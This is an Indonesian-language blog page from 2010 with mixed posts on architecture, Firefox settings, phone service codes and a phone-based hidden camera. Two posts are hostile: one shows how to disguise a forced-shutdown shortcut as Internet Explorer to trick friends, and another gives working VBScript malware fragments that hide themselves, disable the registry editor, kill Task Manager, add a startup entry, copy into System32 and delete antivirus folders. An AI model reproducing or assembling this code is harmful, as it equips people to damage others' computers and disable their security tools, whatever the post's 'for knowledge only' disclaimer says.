Architektur Blogger Headline Animator

Architektur Blogger

rss

30 April 2010

Apartement Mewah Startrex

APARTEMEN BERPENAMPILAN STASIUN TELEVISI ANGKASA


Askum...! kita ketemu lagi ni.. kali ini saya akan memberitahukan suatu artikel atau informasi yang tak kala menariknya dengan posting yang sebelumnya, tulisan ini di buat sekedar penyampaian informasi saja n ngitung2 bisa membantu abang Lulus Sutopo untuk mempublikasikan tulisan ini. janagan basa basi mari kita telusuri, apa sih artikel mengenai apartemen startrex itu..???

Seorang penggemar Star Trek mengubah apartemennya menjadi replika stasiun Televisi Angkasa paling terkenal. Dia memulai proyek pada tahun 1999 setelah istrinya meninggalkannya dan mengubah rumahnya menjadi rumah yang dibuat untuk episode Star-Trek pada tahun 2004.




Kamar apartemen studio di Hinckley, Leicestershire merupakan replika dari dek kapal luar angkasa penerbangan Star Trek,yang mempunyai ketinggian 500 kaki perseginya.

Ini termasuk perintah konsol, mengubah bentuk jendela tampak seperti lubang intai dan fitur diaktifkan seperti pencahayaan suara, AC, dan hal-hal menarik lainnya tetapi tidak ada tempat tidur.
 

Dari pengalamannya itu ia memungkinkan dia untuk mendirikan perusahaan interior desain sendiri, dengan berbagai desain interior.












Dia menghabiskan £ 100,000 yang dipinjam dari 2 pinjaman besar dan 14 kartu kredit untuk pemasaran idenya dan membayar untuk barang dagangan.Dia yakin bahwa Trekkies seluruh dunia akan menginginkan rumah seperti itu dan membayar dia untuk Makeover.  Tapi kenyataanya tidak seperti yang direncanakan, menurut dia salah dan hanya kewalahan dari yang ia duga sebelumnya. 


Memang segala sesuatu kadang meleset dari apa yang kita rencanakan dan semua itu butuh pengorbanan.




Created By Archcom

24 April 2010

Rancangan Bangunan Tepian Air Terbaik Di Dunia

10 Proyek Bangunan Tepian Air Di Dunia

Kecepatan penduduk dunia yang sedang berkembang, menggabungkan dengan tingkat kenaikan air laut dan samudra karena pemanasan global, cepat atau lambat kita harus menemukan beberapa tempat baru atau mencari cara baru untuk menampung lebih banyak orang pada hari-hari yang akan datang. Sebagai salah satu dilema memberikan cara untuk beberapa solusi baru, struktur mengambang telah muncul sebagai sebuah jalan keluar yang tidak hanya memecahkan masalah di seluruh dunia mengurangi lahan tetapi juga menjanjikan untuk menawarkan pengalaman hidup mereka memukau bagi penduduk yang inovatif. Berikut adalah beberapa struktur mengambang paling menarik yang memenuhi semua kebutuhan akan berubah menjadi tempat tinggal bagi penghuninya

1. Underwater City 

archcom. Image 01

archcom. Image 02

 archcom. Image 03

The 'Underwater Kota' di Bulgaria adalah kota revolusioner yang sama bahwa tingkat air adalah 'dibangun di tengah danau, bukan di sebuah pulau, namun sebenarnya di bawah'. Padahal, kota ini tidak sepenuhnya di bawah air, bendungan besar (berdiameter 1.377 kaki dan 65 di ketinggian) di sekitar kota,kesana dapat diakses melalui transportasi air.

2. Aerohotel

archcom. Image 01

archcom. Image 02

archcom. Image 03

Floating Aerohotel oleh Alexander Asadov adalah desain arsitektur yang luar biasa yang akan menjadi sesuatu yg enak di lihat untuk struktur terapung masa depan. Menampilkan 200 meter lebar badan pusat duduk di berbagai balok, menyerupai roda sepeda dengan tangan pendukung, Aerohotel akan melampirkan kafe, restoran dan kebun musim dingin, di samping utama hotel.
Asadov Alexander adalah seorang arsitek Rusia yang terkenal karena desain dekonstruktif bahwa counter kemakmuran monolitik terstruktur bangsa.


3. Lilypad

archcom. Image 01

archcom. Image 02

archcom. Image 03

 archcom. Image 04


Di sinilah Vincent Callebaut's Lilypad masuk ke dalam gambar. Usulan sebagai "Floating Ecopolis untuk Pengungsi Iklim", tempat tinggal futuristik ecotectural dapat rumah sekitar 50.000 jiwa. Menakjubkan mundur mencari tempat bagi dirinya di tahun 2100 ketika setengah garis pantai yang ada di dunia telah menghilang karena meningkatkan permukaan laut. Dengan Mercedes stealth branding di jendela, dinding biotik dan atap, atap ditutupi dengan padang rumput menyerap energi matahari dan bagian bawah terendam melayani sebagai dasar laut alami untuk plankton dan tanaman laut, ambisi Ecopolis beberapa fitur yang cukup kickass bio-tech fungsi yang akan membantu masyarakat mengambang mempertahankan diri dan bertahan hidup di lingkungan yang semakin menantang masa depan bumi.

4. Waterpod 

archcom. Image 01

archcom. Image 02

Waterpod rumah terapung adalah sebuah pulau triple-kubah yang akan memenuhi semua kebutuhan energinya dari sumber-sumber alam. Selesai dengan kayu daur ulang, logam, plastik, kain dan bahan lain, Waterpod akan mendukung energi alternatif dan pertanian vertikal irigasi oleh air murni dari Sungai Hudson.

5. Hydropolis Underwater Hotel

archcom. Image 01

Dubai, gagasan membangun sebuah hotel mewah 66 meter di bawah air akan terdengar tidak masuk akal. Tapi di samping arab-Burj al-, pencakar langit berputar, pulau diproduksi dan lereng ski indoor dari modal perdagangan padang pasir, yang Hydropolis akan cocok langsung masuk Dengan biaya UK£300 million,harga kamar dapat mencapai USD $ 5.500 untuk per malam

6. AZ island

archcom. Image 01

AZ Island adalah sebuah konsep sebuah pulau buatan itu mampu gerakan di laut. AZ Island adalah gagasan Jean-Philippe Zoppini, yang bekerja sama dengan perusahaan Alstom Marine untuk mewujudkan mimpinya. Mengambang keajaiban buatan manusia dalam proporsi yang sangat besar. Jika dituruti, maka akan mengukur 400m X 300m; cukup mampu untuk rumah 10.000 penumpang secara bersamaan pada permukaannya.Saat ini, proyek tersebut sedang dipelajari untuk kemampuan finansial dan teknis. Sebagai diantisipasi proyek €2 billion ini membuktikan menjadi proposisi keras dan memiliki kesulitan konstruksi berat.


7. Mermaid-Inspired Aquatic Building 

 archcom. Image 01

perusahaan Eropa, JDS Arsitek 'Mermaid bangunan dengan cara yang baik dan sangat konyol pemikiran. Pengkalimatannya dari Mermaid menunjukkan bangunan di setiap biome ekstrim di bumi - dari pulau-pulau tropis untuk lingkungan glasial. Bangunan teras membanggakan penghijauan, dolphinarium sebuah, hotel, dan properti liburan. Apakah ini hanya sebuah kapal pesiar dimuliakan? Atau model baru untuk pengembangan pribadi yang benar-benar responsif terhadap lingkungan perairan tersebut?

8. Floating City for Shanghai World Expo 

  archcom. Image 01

archcom. Image 02

Sebuah tim desainer Belanda baru-baru ini mengungkapkan rencana untuk membangun sebuah kota yang mengambang di Sungai Huangpu Shanghai. Jika dibangun, kota ini akan debut pada World Expo Shanghai 2010. Kota mengambang akan memiliki elemen hijau banyak - ia akan menggunakan air sungai untuk pendinginan dan kota ini akan memanfaatkan energi terbarukan.Model pembangunan dipamerkan di Shanghai Sculpture Space, memiliki lima bola sarang lebah-suka, satu yang besar dikelilingi oleh empat yang lebih kecil, berfungsi sebagai bioskop 3D, pub, pusat perbelanjaan dan teater.

9. Eco-Island City

  archcom. Image 01

Wolf Hibertz ingin menggunakan lautan sebagai situs masa depan rumah. Perancang visioner telah menemukan cara untuk menggunakan sinar matahari untuk mengubah mineral dalam air laut menjadi kapur. batu kapur tersebut akan digunakan untuk membangun rumah pulau terapung. Autopia Ampere akan dimulai sebagai rangkaian kawat-mesh armatures berlabuh di atas gunung laut. Setelah tempat itu , mereka akan langsung terhubung ke tegangan rendah saat ini disediakan oleh panel surya.

10. Jelly - Fish 45 Habitat.

  archcom. Image 01

  archcom. Image 02

Murah! Dirancang oleh Giancarlo Zema, yang "Jelly-fish 45 Habitat" terdiri dari lima tingkat pisahkan dihubungkan dengan tangga spiral menyolok. Lantainya dibagi menjadi daerah zona-cheesy berjudul termasuk studi, malam, hari, tamu dan tempat melihat. Padahal, jika Anda membeli rumah terapung, Anda dapat mematuhi tata-nama, mana yang Anda inginkan. sudut pandang 3m membentang di bawah permukaan dan terlihat seperti ubur-ubur yang fantastis. Kursi-kolosal di-laut-berdiri 10m tinggi dan lebar 15m.

Terima Kasih: Anda telah mengunjungi blog ini.! untuk pengembangan lebih lanjut maka anda dapat menancapkan komentar anda di bawah artikel ini, sehingga blog ini dapat berkembang lebih baik lagi..
Thenks semoga artikel ini bermanfaat bagi anda semua_ 

Created By Archcom

19 April 2010

Cara Mempercepat Kinerja Firefox

 
Berikut adalah beberapa trik sederhana untuk mempercepat kinerja Firefox anda. Trik – trik ini memungkinkan Firefox untuk mengunduh halaman situs lebih cepat dengan membuka lebih dari satu koneksi agar ia dapat melakukan lebih dari satu download setiap waktu.


Harap diingat bahwa ini hanya berlaku bagi pengguna jaringan pita lebar (broadband), jadi bagi pengguna dial-up, anda dapat melupakannya untuk saat ini.
 
1.      Ketik “about:config” pada address bar dan tekan return. Scroll ke bawah untuk mencari konfigurasi – konfigurasi ini:
“network.http.pipelining”
“network.http.proxy.pipelining”
“network.http.pipelining.maxrequests”
Biasanya browser hanya akan membuat satu permintaan terhadap sebuah situs setiap waktu. Namun dengan pipelining, anda dapat membuatnya lebih dari satu, yang membuat download halaman menjadi lebih cepat.

2.      Ubah entri menjadi:
Set “network.http.pipelining” menjadi “true”
Set “network.http.proxy.pipelining” menjadi “true”
Set “network.http.pipelining.maxrequests” menjadi 30. Ini berarti ia akan melakukan 30 request dalam satu waktu.

3.      Terakhir, klik kanan dimanapun dan pilih New-> Integer. Namai “nglayout.initialpaint.delay” dan set value menjadi “0″.
Jika anda menggunakan koneksi broadband, maka anda akan membuka halaman dengan lebih cepat sekarang!

selamat nencoba
Source: 

http://www.universefirefox.com/tips/simple-trick-to-make-firefox-faster
 

Created By Archcom

13 April 2010

Membuat Virus Palsu Pada Komputer

hahaha... ngomong-ngmong masala virus komputer saya punya cara yang dapat membuat virus palsu pada komputer anda ni.. tapi jangan anggap remeh ni virus soalnya kalo tidak tahu menghentikan prosesnya bisa-bisa aktivitas pada komputer anda bisa terganggu loh..!!!
Nah mari kita lihat cara membuatnya, simpel aja ko.!
caranya :
1. Klik kanan pada Desktop ? New ? Shortcut
2. Pada kolom, ketikkan shutdown –s –t 300 –c “Virus Activated”
3. Klik Next ? ketikkan nama file yang kamu inginkan (Misal. Internet Explorer)
4. Klik kanan pada file untuk Properties dan klik Change Icon ? Icon Internet Explorer untuk mengelabui orang membukanya.
5. Virus palsu kamu sukses dibuat.
6. Sekarang, kirimkan virus palsumu kepada teman-temanmu. Ketika dibuka, file tersebut tidak dapat menghilang walaupun menggunakan Task Manager.
7. Untuk menghilangkannya, hanya ada 1 cara. Hanya dengan klik tombol Start kemudian klik Run.
8. Pada kolom tersebut, ketikkan shutdown –a.
9. Virus palsu tersebut berhasil dihapus.


Catatan : artikel ini hanya digunakan sebatas pengetahuan saja, jika anda sala memanfaatkannya maka resiko tanggung sendiri..
selamat mencoba
Created By Archcom

Code Rahasia Handphone

Kadang-kadang Hp saya sering bermasalah hingga saya membawanya di tukang service agar di perbaiki, setelah di tempat service mala di tekan beberapa tombol di hanphone saya kemudian langsung jadi. dalam sekejap saja saya udah bayar Rp.150.000.. wah.. enak ni kalo jadi tukang service henphone kerjanya dikit bayarannya gede..!!!
Nah ini dia kode atau tombol rahasia dari telpon seluller (HP)

Jenis HP Nokia
 *#30# : Menampilkan ‘private number’ yang menghubungi anda.
*#73# : Mereset timer ponsel dan skor game (pada beberapa ponsel).
*#7780# : Mengembalikan ke setting pabrik (factory setting).
*#2820# : Alamat IP perangkat Bluetooth (untuk ponsel yang mempunyai Bluetooth).
xx# : Akses cepat ke nama/nomer telepon di phone book ponsel, misalnya 20#.
Tombol off : Menekan dengan singkat, untuk berpindah antar profile.
*3370# : Mengaktifkan EFR(Enhanced Full Rate) Codec (tidak berlaku di ponsel Symbian).
#3370# : Menonaktifkan EFR Codec.
*#4270# : Mengaktifkan Half Rate Codec.
*#4270# : Menonaktifkan Half Rate Codec.
*#0000# : Menampilkan versi software ponsel.
*#9999# : Kode alternatif jika *#0000# tidak bekerja.
*#06# : Melihat nomor IMEI (Internasional Mobile Equipment Identity).
*#21# : Mengecek nomor pengalihan “All Call” yang digunakan.
*#2640# : Menampilkan kode keamanan ponsel yang digunakan.
*#43# : Mengecek status “Call Waiting”.
*#61# : Untuk mengecek nomor pemanggil yang dialihkan ketika tak anda jawab.
*#62# : Mengecek nomor pemanggil yang dialihkan ketika ponsel anda di luar jangkauan.
*#67# : Mengecek nomor pemanggil yang dialihkan ketika ponsel anda sedang sibuk.
**21*number# : Menghidupkan pengalihan “All Call” pada nomor yang diisi.
**61*number# : Menghidupkan pengalihan “No Reply” pada nomor yang diisi.
**67*number# : Menghidupkan pengalihan “On Bussy” pada nomor yang diisi.
*#67705646# : Mengganti logo operator logo pada Nokia 3310 dan 3330.
*#746025625# : Menampilkan status SIM Clock.
*#7760# : Menampilkan kode pabrikan (sebagian besar ponsel tipe lama).
*#92702689# : Memunculkan : 1. Serial Number, 2. Date Made, 3. Purchase Date, 4. Date of last repair, 5.Transfer user data. Keluar dari mode ini harus merestart ponsel ( pada beberapa ponsel ).

Jenis HP Sony Ericsson 
*#06# : Melihat nomor IMEI (Internasional Mobile Equipment Identity).
*#0000# : Mereset bahasa kembali ke English.
> * < < * ” untuk melihat semua teks yang terdapat pada ponsel.
< * * < : Mengunci SIM Card.

Jenis HP LG
LG all models test mode: Type 2945#*# on the main screen.
2945*#01*# Secret menu for LG
IMEI (ALL): *#06#
IMEI and SW (LG 510): *#07#
Software version (LG B1200): *8375#
Recount cheksum (LG B1200): *6861#
Factory test (B1200): #PWR 668
Simlock menu (LG B1200): 1945#*5101#
Simlock menu (LG 510W, 5200): 2945#*5101#
Simlock menu (LG 7020, 7010): 2945#*70001#
Simlock menu (LG 500, 600): 2947#*
LG-U81XX SPECIAL CODES
Code to read phone version :
- Phone without SIM
- Enter 277634#*# or 47328545454#
- Select ‘SW Ver.info’
Code to reset phone :
- Phone without SIM
- Enter 277634#*# or 47328545454#
- Select ‘Factory Reset’
Code to enter UNLOCK MENU :
- Phone wit SIM inside
- Enter 2945#*88110#
Test Menu 8330 : 637664#*#
Test Menu 8180 V10a: 49857465454#
Test Menu 8180 V11a: 492662464663#
Test Menu 8130-8138: 47328545454#
Test Menu 8110-8120: 277634#*#
Important!
Try these codes at your own risk! We don’t accept any complaints.
Some of these codes may not work.

Jenis HP Motorola
 IMEI number:
*#06#
Code to lock keys. Press together *7
Note: [] (pause) means the * key held in until box appears.
Select phone line – (use this to write things below the provider name):
[ ] [ ] [ ] 0 0 8 [ ] 1 [ ]
Add phonebook to main menu:
[ ] [ ] [ ] 1 0 5 [ ] 1 [ ]
Add messages to main menu:
[ ] [ ] [ ] 1 0 7 [ ] 1 [ ]
Copy SIM memory (phonebook menu):
[ ] [ ] [ ] 1 0 8 [ ] 1 [ ]
Eng Field options (main menu):
[ ] [ ] [ ] 1 1 3 [ ] 1 [ ]
Slow (Frequency of search menu):
[ ] [ ] [ ] 1 0 1 [ ] 1 [ ]
Medium (Frequency of search menu):
[ ] [ ] [ ] 1 0 2 [ ] 1 [ ]
Fast (Frequency of search menu):
[ ] [ ] [ ] 1 0 3 [ ] 1 [ ]
Enable EFR:
[ ] [ ] [ ] 1 1 9 [ ] 1 [ ]
Function :
[ ] [ ] [ ] # # # [ ] 1 [ ]
Change pin:
[ ] [ ] [ ] 0 0 4 [ ] 1 [ ]
Unblocking using the “puk” number:
[ ] [ ] [ ] 0 0 5 [ ] 1 [ ]
There are lots of similar codes exist. If you change the last number to 0 you can deactive that code. The 3 digit number at the middle are from 0 to 999. I put the most interesting codes. (EFR):Enhanced Full Rate Codec.
You can change GSM frequencies to 900/1800 by entering the enginnering model. Following the below steps:
enter menu and press 048263* quickly, then you will enter the secret engineering menu
under “Opcode”
input 10*0*3 for GSM 900
10*0*4 for GSM 1800
10*0*5 for GSM 1900
10*0*6 for dual band GSM 900/1800
10*0*7 for dual band GSM 850/1900

Jenis HP BenQ-Siemens
Software version:
*#06#
to see more info, press softkey again
English menu:
*#0001#
Deutsch menu:
*#0049#
Secret Code:
*#0606# remove sim card before
Unlock Sim:
*#0003*(secret code)#
Bonus Screen:
*12022243121
Factory settings: Type *#9999# to reset factory settings.(not tested).
Important!
Try these codes at your own risk! We don’t accept any complaints.
Some of these codes may not work.
>-CODE MEMBUKA SIMLOCK-<
Beberapa tipe ponsel yang dibundling dengan operatornya, seperti N70 Vadafone, 6630 Tim, 6680 Orange, saat dipakai dengan provider lain (semisal dipakai untuk Telkomsel) tidak akan bisa atau rejected network, Untuk membukanya, agar bisa dipakai dioperator lain, anda bisa memakai kode tetentu.
# pw+ 1234567890 +1 # Provider LOCK status
# pw+ 1234567890 +2 # network LOCK status
# pw+ 1234567890 +3 # Country LOCK status
# pw+ 1234567890 +4 # Sim Card LOCK status
Code 1234567890 diganti dengan angka tertentu yang bisa dihitung dengan program DCT4
Calculator, SmartDCT4Calc dan semacamnya.
Note:
- Kesalahan dalam melakukan ini dapat mengakibatkan HP anda terkunci total. Tidak dianjurkan untuk pemula.
- Untuk memunculkan huruf p,w, dengan menekan tombol # beberapa kali
>-CODE YANG BERHUBUNGAN DENGAN JARINGAN-<
* 3370 # EFR aktif
Mengakfifkan EFR (EFR = Enhanced Full rate , modus sinyal didua sisi/penuh, berdampak sinyal lebih kuat dan stabil, namun boros batrai
# 3370 # EFR tidak aktif
* 4720 # HRC aktif
Mengaktifkan modus HRC (half rate coding), coding sinyal setengahnya saja, sinyal tidak terlalu kuat (disarankan dipakai pada daerah yang dekat dengan BTS), modus ini hemat baterai
# 4720 # HRC tidak aktif
note:
-kode EFR maupun HFR, tidak bisa diakses pada sebagian besar ponsel s60 (karena mode EFR/HR dilalukan otomatis), namun bisa pada ponsel seri 40, ataupun dibeberapa ponsel non nokia. (tested on siemens)
-Setelah anda memasukkan kode ini, HP akan restard dengan sendirinya.

semoga ni kode dapat bermanfaat buat kalian semua
Created By Archcom

3 April 2010

Camera Pengintai Sederhana

Banyak teman" yang ingin memiliki kamera pengintai, namun katanya harga di pasaran sangat mahal. sehingga saya berpikiran untuk menulis artikel ini biara bisa memberikan solusi pada teman" sekalian. yah...!!! biar resolusi gambarnya ga sebagus kamera asli tapi kalau cuma sebagai pengintai di ruma sendiri shii... lumayan kan..

Nah sekarang.. kalian bisa baca selengkapnya..!
Dalam hal ini kamera pengintai yang saya gunakan yaitu kamera handphone, kemudian di koneksikan ke PC anda dengan menggunakan software SmartCam pada handphone dan PC.

Langkah - Langkahnya :
1. siapkan Handphone dan PC + Bluetooth
Syaratnya yang jelas harus ada CAMERA nya, trus OS Handphone nya Symbian, ada Bluetooth atau Wifi juga lebih baik sebab koneksi menggunakan wifi sangat baik dan jarak koneksinya sangat besar di bandingkan dengan bluetooth. untuk saat ini ponsel yang support untuk SmartCam antara lain: Nokia 3250, Nokia 5500, 5800 XpressMusic, N97, E71, E50, E60, E61, E62, N71, N73, N70, N80, N90, N91, N92, N93, N95, Nokia 6680, Nokia 6630, Nokia 6600, Nokia 3230, Nokia 7610, Nokia 3660,  Atau kalian  juga bisa coba ponsel lain siapa tau bisa.

2. Instal Software SmartCam ke Handphone dan instal juga Software SmartCam untuk PC












3. Aktifkan Bluetooth atau Wifi di HP dan Komputer kalian. Kalau punya Wifi lebih bagus, karena jangkauannya lebih luas.

4. Jalankan SmartCam di HP dan Komputer.
Pilih koneksi yang di gunakan, memakai koneksi Bluetooth atau Wifi. Kemudian dari HP kalian isikan nama komputer kalian (kalau memakai koneksi Bluetooth), atau ketikkan nomor IP komputer kalian (kalau memakai koneksiWifi). Jadi dahhhh......

5. Dan yang tak kalah pentingnya letakkan HP kalian di tempat tersembunyi, kan jadi gak lucu klo di curi maling.


- Untuk dapatkan Software SmartCam untuk Hp, download di sini
- sedangkan untuk PC anda bisa download di sini
  Terima kasih buat blog Klikbebas.blogspot.com atas artikel" menariknya

2 April 2010

Cara Cepat Membuat Sebuah Virus



Sebelumnya, berikut ini cara-cara paling gampang untuk membuat virus.
semua hal dibawah ini hanya sebagai penambah pengetahuan kita saja
dan tidak boleh disalah gunakan untuk hal-hal yang bersifat merusak.
Dan saya tidak bertanggung jawab jika itu terjadi. Sekarang kita akan
membahas cara gampang membuat virus pake vbs file.

pertama, berikut ini hal-hal yang wajib kita siapin sebelum membuat virus.
# seperangkat komputer berikut monitor,cpu,mouse,kibor, dll (wajib)
# kita harus menyiapkan sebuah file yang ber-ekstensi vbs (*.vbs)
# secangkir teh anget.
# akan lebih afdoL kalo ditemenin lagu2nya rhcp (aku ngefans ma rhcp)

Untuk eksekusi pertama, yang dilakukan virus biasanya mengubah registry.
Sebenarnya udah aku bahas di blogku ini. tapi nggak papa aku ulangin aja.
biar keliatan resmi :-). misalnya:

1. mendisable regedit. Yang kita tulis:
On Error Resume Next(perintah ini digunakan pada file vb
supaya kalo ada yang salah bisa dilanjutin kode selanjutnya)
CreateObject("WScript.Shell").run "cmd.exe /c reg add hkcusoftware\microsoft\windows\currentversion\policies\system /v
disableregistrytools /t reg_dword /d ""1"" /f", vbhide

sebenarnya banyak cara untuk mendisable regedit. misalnya kek gini:
CreateObject("WScript.Shell").regwriteHKEY_CURRENT_USERsoftware\microsoft\windows\currentversion\policies\systemdisableregistrytools", 1, "REG_DWORD"

lalu mengubah registry yang lain. yang nggak aku bahas disini karena
udah pernah aku bahas pada postingan yang lain di blogku ini.

2. mengopikan diri ke direktory lain

CreateObject("Scripting.FileSystemObject").
GetFile(WScript.ScriptFullName).Copy "c:\windows\system32\virus.vbs"
Ada juga cara lain dengan kide seperti ini:
On Error Resume Next
createobject("scripting.filesystemobject").copyfile wscript.scriptfullname,
createobject("scripting.filesystemobject")
.getspecialfolder(1) & "\virus.vbs"
misalnya untuk mengkopikan diri ke direktory C:\WINDOWS\System32
dengan nama virus.vbs
.getspecialfolder(0) digunakan untuk direktory WINDOWS
.getspecialfolder(1) digunakan untuk direktory SYSTEM32 pada windowsXP
.getspecialfolder(2) digunakan untuk direktory Temporary

3.Membunuh proses.
digunakan untuk membunuh proses
(proses adalah program yang sedang berjalan)
misalnya kita akan membunuh proses taskmanager
On Error Resume Next
CreateObject("WScript.Shell")
.run "taskkill /f /im taskmgr.exe", vbhide

4.Menjalankan virus pada saat startup atau saat windows dihidupkan.
menggunakan regedit
On Error Resume Next
CreateObject("WScript.Shell").RegWrite "HKEY_LOCAL_MACHINESoftware\Microsoft\Windows\CurrentVersion\Run\virus"
, "c:\windows\system32\virus.vbs"
(menjalankan virus yang berada di direktory c:\windows\system32
dengan nama virus.vbs)

5.Menghapus File / Folder
agar virus yang kita buat tidak banyak menggunakan script bisa di singkat seperti ini:
On Error Resume Next
set hapus = CreateObject("Scripting.FileSystemObject")
hapus.DeleteFile "C:\xxx.exe" '(menghapus file xxx.exe di direktory C:\)
hapus.DeleteFolder "C:\antivirus" '(menghapus folder antivirus di direktory C:\)
6.Merestart Windows
CreateObject("WScript.Shell").run "shutdown -r -f -t 60", vbhide
merestart windows dalam waktu 60 sekon

7.Meng-ShutDown Windows
CreateObject("WScript.Shell").run "shutdown -s-f -t 60", vbhide
mematikan windows dalam waktu 60 sekon :)yang beda cuman
"shutdown -s-f -t 60"
S = untuk shutdown dan
R = untuk reboot\restart

8. Mengaktifkan Virus Pada Waktu tertentu
If day(now) = 1 and month(now) = 1 and year(now) = 2007 then
'(masukkan kode virus disini)
End if
'misalnya kalo mau mengaktifkan pada tanggal 1, bulan 1
'dan tahun 2007

OK.. Selamat mencoba.! Tapi ingat artikel ini hanya dipergunakan untuk menamba pengetahuan saja, bukan untuk kejahatan.

Abstrak Galeri Wisata Dan Seni Budaya Di Tidore


ABSTRAK
Galeri wisata seni dan budaya di Tidore dihadirkan karena memiliki peranan yang sangat penting dalam mempromosikan seni dan budaya kepada masyarakat luas sehingga potensi wisata khususnya dibidang seni dan budaya dapat dikenal dimata dunia, yang juga memiliki peranan penting dalam menyelamatkan warisan budaya sehingga peninggalan-peningalan leluhur yang memiliki nilai seni yang tinggi dapat dilestarikan dengan baik.
Galeri wisata seni dan budaya lahir sebagai karya arsitektur modern, tetapi dalam pendekatan perancangan menerapkan kajian bentuk budaya sehingga melahirkan sentuhan-sentuhan desain arsitektural seperti pada tampilan bangunan.
Penerapan konsep dasar dengan menciptakan suasana rekreatif didasarkan pada aktifitas kota yang padat dan bervariasi sehingga membuat setiap orang membutuhkan suasana rekreatif di luar keseriusan bekerja, oleh karena itu fungsi bangunan yang menjadi substansi seni dan budaya perlu dikombinasikan dengan penciptaan suasana santai dan rekreatif pada fasilitas ruang luarnya.
Kata Kunci : Galeri, Wisata, seni budaya Tidore
Rahman Marajabessy :) :) :)

Tips Membuat Slide Photo Di Blog Anda

Pengen blog anda tambah menarik..? nah.. skarang ada tips dari saya untuk membuat slide photo or gambar pada blog anda. ok ga perlu banyak ngoce kita langsung aja yach.
 
Pertama-tama anda harus mempunyai koleksi photo or gambar pada PC anda, kemudian bualah account baru di Photobucket, setelah terdaftar maka anda dapat menggunakan berbagai fitur yang ada pada situs tersebut. nah....!!! gampang kan..? untuk informasi lebih lanjut anda dapat kunjungi ke situs tersebut http://www.photobucket.com

nahh.... skarang anda dapat mencobanya.. tampilanya akan seperti yang ada lihat pada blog saya
thenks.... by Archcom

Berlangganan via email

Ingin Artikel Terbaru Langsung ke Email anda? Masukan Email Untuk Berlangganan:


Delivered by FeedBurner

Recent Comments



Mau punya buku tamu seperti ini?
Klik di sini (Info Blog)